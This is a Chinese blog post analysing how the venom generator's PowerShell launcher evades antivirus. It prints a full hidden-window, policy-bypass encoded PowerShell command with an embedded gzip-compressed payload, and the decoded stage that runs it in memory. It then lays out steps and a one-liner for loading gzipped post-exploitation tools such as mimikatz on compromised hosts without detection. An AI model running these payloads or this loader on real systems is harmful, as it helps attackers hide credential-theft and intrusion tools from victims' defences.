it2021-venom的powershell免杀技术分析|IT2021科技站

2023年2月22日 10:23:51枫少@KillBoy

枫少@KillBoy

管理员

关注

219
文章

0
粉丝

渗透测试4016,736字数 0阅读0分0秒阅读模式

AI智能摘要

你是否知道，那些被杀软秒杀的PowerShell后渗透脚本，其实只需一层“压缩壳”就能悄然绕过？本文深度拆解venom框架的免杀技术，揭示其如何利用Gzip压缩与内存加载，在硬盘层面完美隐藏恶意载荷。不同于传统的Base64混淆——如今早已被杀软盯死——本文带你掌握一种更隐蔽的免杀思路：通过`GzipStream`直接在内存中解压并执行代码，避开静态特征扫描。不仅适用于PowerShell，理论上还可延伸至EXE免杀。实战演示从压缩、编码到动态加载的完整流程，虽有坑（如EXE执行失败），但思路远比结果珍贵。安全研究员、红队工程师必看。

— AI 生成的文章内容摘要

前言

power shell具有在硬盘中易绕过，内存中难查杀的特点。venom中提供了一种加载方式，可以有效的绕过硬盘查杀。本文一层层把venom生成的外壳褪去，得到其加载方式。最后使用该方法，可以实现硬盘免杀。

本例使用【2】Windows平台下，【10】bat+powerhsell生成

第一层

该层使用了base64编码，源码如下。

powershell.exe -nop -wind hidden -Exec Bypass -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDAEoARgB0AFYAMABDAEEANwBWAFcAYgBXAC8AaQBPAEIARAArADMARQByADkARAA5AEUASwBLAFkAbQBPAEUAaQBqAHMAQwA1AFUAcQBYAGMASgBiAGEAQQBtAEYAQgBrAEsAQgBSAFMAZQBUAE8ATQBGAGcAWQBwAG8ANABMAGIAQwAzAC8ALwAzAEcAawBIAFMANwB0ACsAMwBkADcAawBrAFgAdABZAG8AegBuAGgAbgBQAFAAUABQAE0ARwBEADgASgBYAFUANQBZAEsATABrAHIANgBjAHYAWgA2AFUAawBQAFIAVwBnAHQASwBiAGwANABqAHYASgBTAHoAdgAxADAARQBhAGcAbgBKAHkARABQAGIAWgBLAGQAZABDAFUAcABVADMAMgB6AHEAYgBNADEASQB1AEgAcwA4AHIASwBXAFIAQgBFAE8AKwBmAEcANwAwAE0ASgBjAGoAMgBPADgAbgBsAE8AQwBZADAAVwBWAC8AcABSAEcAQwB4AHoAaAA4ADkAdgA1AEUAcgB0AGMAKwBpAEwAbAAvAGkAaQAwAEsASgBzAGoAbQBxAHIAdABhAHMAaABkAFkATwBsAGMARAB6ADIAeAAxADIARQB1AEUAcQBFAFUANwBBADAAbABYAEoARQAvAGYANQBiAFYANgBYAGwAcABWAG0AZwA4AEoASQBqAEcAaQBtAHoAdgBZAG8ANwBYAEIAWQA5AFMAVwBaAFcAKwBxAHUATABBAHcAVwA2AEQARgBkAGsAaQBiAHMAUgBpADUAdgBQAEMAaQBJAFQAbABpADgASQB3AGoASgBHAFAAdQArAEQAdABFAFYAdQBZAEwANQBnAFgAeQB5AG8AawBBAFgAOABSADUAawBrAFUAUwBpAEkAZABZAFgALwBjAFYAVwBSAFkAOQBpAEwAbQA2AHAANABYADQAVABpAFcAOAA5AEoAVQBlAEoANwBPAFoAcgA4AHIAMAAvAFQAWQB1AHkAVABrAFoASQAwAEwANwBaAEQAagBpAEcAMQBzAEgARAAwAFMARgA4AGMARgBFADQAVQBlAHgAWABmAFkAbgA0AEcAVgB6AFMATQBTAEIAagBOAFYAQgBiAFYASAB0AHMASgBLAEwAawB3AG8AegBVAHUALwA0AGsAYgBwADQAcQBjAE0AdABKADgAMQBVAGwANABhAGcAVgBhAFAAUgAyAG8AZQB5AHYAaABqAG0AaABiAHoARQBvAHEAUABoAHYASQByAGMAWQByAEsAcQAvAEIAawAxAFEAZgBjAHYAcAA2AGQAbgBwADMANgBHAFYARwBpAG0AKwBxAHcAOAA1AEkAcgBzAEQAcQBaAEgAdABZAFkAbwBsAE4ANgBMAEMAWQBIAHgAUwB1AHAAbQBKAGMAcwBPAEEAaAB4AEYAZwBuAHkANQBBAFoAUgBnAHQAWABaAE0ANwBaAFMAYgBoADQAawArAGIAZgBOAFMANQBrAHUAYQBKAEsASwBWADkAcQBDAGIATwBvAHcANABzADMAQQBKAHEAMQBuAEwAagBEAEwAUQB2AHcAMgBMAGUAdgBZAEoAeQBHAHUANwAwAEsAMABKAG0ANwBHAFAATwBVADEAawBMAEYAUAA4AFMASABIAFEAcQBiAFcAaABhAEEAVQBPAGQAMwBBAFgAaAAxAFQASABDAEEAdQBjAEIATwAxAC8AcwBHAHMAcwBTAGIAOAAyAGQAWgBJAEMAUABWAHcAcABMAHQAUQBxAEIAaQBpAGcAaABxAHEAMwB3AGQAegBMAEkAVQBpAHQAMABNAEwAcgB3AEcAaQA0AHoAZQBRAEwAKwBjAEQAMwAzAEcAbQBuAFgASgA4AGwANQAwAHUAdgBrAEYASgByAGwARQBVAHgAMwBtAHAAbAAwAEQARAB1AFgAbgBKAHgAbwBoAGkATAB5AC8AcABZAFUAegBTAEwAVAAzAGgANwBMAEMAVQB2ADQAVgByAEoAWgBRAFQARgA4AFUAOABjAHoAZABUAFUAeABqAFQANAAyAG8AcwBqAEgAbQBVAHUARgBBADAAUwBIADEAZwBiADcAQgBMAEUAQgBWAEkANQBDAFcAVABlAE4AagBZADIAUwBUAEkAagBwAFYAZgB4AGEARwBHAEsASQBVADIAQQBFACsAUABVAEEAZQBRAGkAUAB4AHQATABxAGcAUQBRAFkAUwBpADcARwByAEIAeAByAHkAOQAzAGwAQwA4AEIAcABWAEQAMwB6AGMAcABDAHEARABMAFUANgA0AGYAcQBJAE0AQwA3AE0AbAAvAGkAeQAvAGoAOABwAEcANABBAG8AZwBNAGcAUgBmAFIAUQBYAFYAdAB5AG4AaABlAGMAawBqAEUAWQBYAG8ASQBVAEEAOABVACsAawArAG4AdgA1AGcAYgBJAG8ANQBhAGgATgBNAHkASwBGAGwAMwBUAEkAMABkAEYANQBUAE8AdQBlAE8AbQAyAHgAUwBFAFQARgBFADUAWQBCAEIAeAB5AEwAOABaAHMAYgBXAEIAWQB2AHkAaABjAGgAdwBTAHkAagB2AHQAbAB0AFIAMABlAE0AYgB0AGsARgBxAHUAcwBTAEkAbAAvAFkAbQBVADIAaABiADgARAAwAG0ANQB6AGUAbwBmAHYAWgB2AHIAcABhAGwARgA5AGUAMwBDADEAOQB0AHgAMgB6AEoANwA5AGIANQBwAFYAaAA2AHYAYgBhAGYAQwA3AFUAYQBiADMALwBUAGEAMwBHAHIAYwBMADUAZQAyAGIAdAA0AE4AeAAzAHoAUwAxAHMAMABCAEsAYQA3AEcAbABmADMAbQBtAHUAegB0AGoAdQA2AE4AdAA5AHEASAB2AGIARgAvAEsAaAByAGIALwBUAEwAdwAvAEgASABkADkANABPAFAAdgBuADEAWABlAHQAOABrAG4AVgBHAHQAYgB4AFEAdgBVAEsAZgBlAFMARABvAGoANAA4AGsAbwBWAHUASQBHAGUAVABMADcAWgBOAGgAZgBYAFQAZgA1AGYATwB4AFEATgBQAFMAMQA0AEwANQBVAFIAVwBUAGIAaQBaAFoATwBpAFYAbgA3AHQAcQA2ADMARgBtAFYAMwBmACsAMAA3AHIAWQBYAGwANwBjAGEAbQBWAGgAMQBWAFYAbgBwAEQAMQAyAHQAaAB3ADIAawBhADcARwBaAHMAUgBIAHAAUABjADEAQwB3AG0AQQB4AHYATwA5AFYAKwAwADkAQwBIAHIAZQBWAEQAdgBhAG8ARgBvAEgAdQBQAGQAUABDAHgAZQBiAGgAKwB2ADIAWgA5AGgAMwByAHMAaQBjAGYAbABpAGEAWQA1AHoAZwBVAHAAZgB4AGcAcwBOAGEAMwBxADMAQwBOAHoARQBOAC8AKwBaAG0AbwBsAEIAOABQAGEAUwBRAFkAagBXAEkAOABXAHkALwBtAG8AcgB4AFAAYwB2AFgAZABLADcAcgBhADYAWgB2AGIASQBtAFIATgB0AE4ARABmAHYAYQB2ADEAUABlAHIALwBWAGgAWABkAC8ARwB4AGcAaQBqAHAARgBEAEoAeQAxAG4AOQBSADcAZQAzAFIARQB5AFEANgB0AFgAbQBXAHUAbABjAFIAZwBNAFEASwA3AHQARABWAFoAcgB1ADkANABZADQAawB5ADAAVwBvAG4AUgBDAGQAdABzAFIAdABYAFEAMQA1AHkAZQBQAHYAbABVAGcAdwBwAFUAegBHAEUAegBLAGIAbwBEAGQAMQAxADkAMABKAHMAOQByAGQAUwAvAHUAbgBvAG4ATwBBAEcAawB5AFAARgBoAHMASABwAFIANgA3AGUAbQB0AEkAVwBpAGUASQBFAG8AYwBBAEQAbQBiADkAWgAyAFQAUgBZADEAMAA1AEgAYQBZADAAUgBZAEsAQQByAGMAdwBTAHMAYwBoAFoAagBDAEgAUQBhADMAWABFAFoAZQBuAFYATABtAGkAbgBGACsASABMADEAdwBsAHgAdwBuAHYATABoAHcAaAByAEEAcwBYADcAeQA2AFUAcQBWAG4AUgBmAFgAYgBvAE0AOQBFAGwANQBjAFQAQwBGAEoATQBlAGMASABZAFEAZwBlAEgAQQBWAC8AawBpADkAdAB5AHMAUQBoAGoAdQA3AGkAdABGAEMASABMAG4AOAArAHMAeABqAFkANwA1AGUAZwByAEwAKwBiACsAQQBaAHQAbgA3AC8AVABnAFgAUgBXAGQAawB0AHQAYQAvAGUANwAvAEMAVgByAGEAbgBRAHQANABlAGYAOABLADIAagBmAFoAUAArAHoAKwBGAEoARABGAC8ARABIAGwASAA4AFQAZgBDADMANABKADEARgAvAE0AZgBJAFEASQBCAHoAMABiAGgAZwB2AEYAeAA3AHYAdABEAFEAQgBTAGcAcgB5ADQALwBrAFYAVgBvAFAAcAArACsAbwBoAGYAYgA3AGMASgBQACsALwBDAHIANABLAHoAMAA3ADgAQQA4AGMAeQBmAEMAUwBVAEsAQQBBAEEAPQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

使用 FromBase64String() 解码

$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

第二层

解码后如下

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'syswow64WindowsPowerShellv1.0powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIACJFtV0CA7VWbW/iOBD+3Er9D9EKKYmOEijsC5UqXcJbaAmFBkKBRSeTOMFgYpo4LbC3//3GkHS7t+3d7kkXtYoznhnPPPPMGD8JXU5YKLkr6cvZ6UkPRWgtKbl4jvJSzv10EagnJyDPbZKddCUpU32zqbM1IuHs8rKWRBEO+fG70MJcj2O8nlOCY0WV/pRGCxzh89v5Ertc+iLl/ii0KJsjmqrtashdYOlcDz2x12EuEqEU7A0lXJE/f5bV6XlpVmg8JIjGimzvYo7XBY9SWZW+quLAwW6DFdkibsRi5vPCiITli8IwjJGPu+DtEVuYL5gXyyokAX8R5kkUSiIdYX/cVWRY9iLm6p4X4TiW89JUeJ7OZr8r0/TYuyTkZI0L7ZDjiG1sHD0SF8cFE4UexXfYn4GVzSMSBjNVBbVHtsJKLkwozUu/4kbp4qcMtJ81Ul4agVaPR2oeyvhjmhbzEoqPhvIrcYrKq/Bk1Qfcvp6dnp36GVGim+qw85IrsDqZHtYYolN6LCYHxSupmJcsOAhxFgny5AZRgtXZM7ZSbh4k+bfNS5kuaJKKV9qCbOow4s3AJq1nLjDLQvw2LevYJyGu70K0Jm7GPOU1kLFP8SHHQqbWhaAUOd3AXh1THCAucBO1/sGssSb82dZICPVwpLtQqBiighqq3wdzLIUit0MLrwGi4zeQL+cD33GmnXJ8l50uvkFJrlEUx3mpl0DDuXnJxohiLy/pYUzSLT3h7LCUv4VrJZQTF8U8czdTUxjT42osjHmUuFA0SH1gb7BLEBVI5CWTeNjY2STIjpVfxaGGKIU2AE+PUAeQiPxtLqgQQYSi7GrBxry93lC8BpVD3zcpCqDLU64fqIMC7Ml/iy/j8pG4AogMgRfRQXVtynheckjEYXoIUA8U+k+nv5gbIo5ahNMyKFl3TI0dF5TOueOm2xSETFE5YBBxyL8ZsbWBYvyhchwSyjvtltR0eMbtkFqusSIl/YmU2hb8D0m5zeofvZvrpalF9e3C19tx2zJ79b5pVh6vbafC7Uab3/Ta3GrcL5e2bt4Nx3zS1s0BKa7Glf3mmuztju6Nt9qHvbF/Khrb/TLw/HHd94OPvn1Xet8knVGtbxQvUKfeSDoj48koVuIGeTL7ZNhfXTf5fOxQNPS14L5URWTbiZZOiVn7tq63FmV3f+07rYXl7camVh1VVnpD12thw2ka7GZsRHpPc1CwmAxvO9V+09CHreVDvaoFoHuPdPCxebh+v2Z9h3rsicfliaY5zgUpfxgsNa3q3CNzEN/+ZmolB8PaSQYjWI8Wy/morxPcvXdK7ra6ZvbImRNtNDfvav1Per/VhXd/GxgijpFDJy1n9R7e3REyQ6tXmWulcRgMQK7tDVZru94Y4ky0WonRCdtsRtXQ15yePvlUgwpUzGEzKboDd1190Js9rdS/unonOAGkyPFhsHpR67emtIWieIEocADmb9Z2TRY105HaY0RYKArcwSschZjCHQa3XEZenVLminF+HL1wlxwnvLhwhrAsX7y6UqVnRfXboM9El5cTCFJMecHYQgeHAV/ki9tysQhju7itFCHLn8+sxjY75egrL+b+AZtn7/TgXRWdktta/e7/CVranQt4ef8K2jfZP+z+FJDF/DHlH8TfC34J1F/MfIQIBz0bhgvFx7vtDQBSgry4/kVVoPp++ohfb7cJP+/Cr4Kz078A8cyfCSUKAAA=''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

分析得到关键函数，System.IO.Compression.GzipStream 。本层利用gzip加密
## 第三层

这一层是以二进制的形式读取压缩后的文件，然后将二进制进行base64编码。再使用FromBase64String将字符串转为二进制，用GzipStream读取，最后作为代码块执行。
## 总结

使用 FromBase64String 已经不可取了，因为该函数本身已经被标记为特征码了。
反病毒软件会自动对base64字符串进行分析，base64编码起不到混淆的作用。
可以在已经获得权限的场景下，将powerhsell后渗透工具gzip加密上传，使用 GzipStream 加载，达到免杀的效果。使用方法如下：
- 将powerhsell脚本压缩为gzip
- 以二进制形式读取压缩包
- 使用本文最后的语句获得代码块
- 执行代码块
亲测mimikatz免杀，但是提取密码失败了，，，

[scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String($byte))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())

扩展

对于exe也可以使用这种方法硬盘免杀，因为exe可以编码放到power shell里执行。但是本人在将exe放进power shell里执行的时候失败了，不懂为什么？？？

venom的powershell免杀技术分析

第一层

第二层

扩展

热门话题

Android设备调式模式利用

为什么说不要用VLAN、VPC解决东西向隔离问题

开源固件仿真平台FAP对嵌入式固件的模拟与定制

Zeek：高度定制化的DNS事件及文件还原

发表评论

热门搜索

第一层

第二层

扩展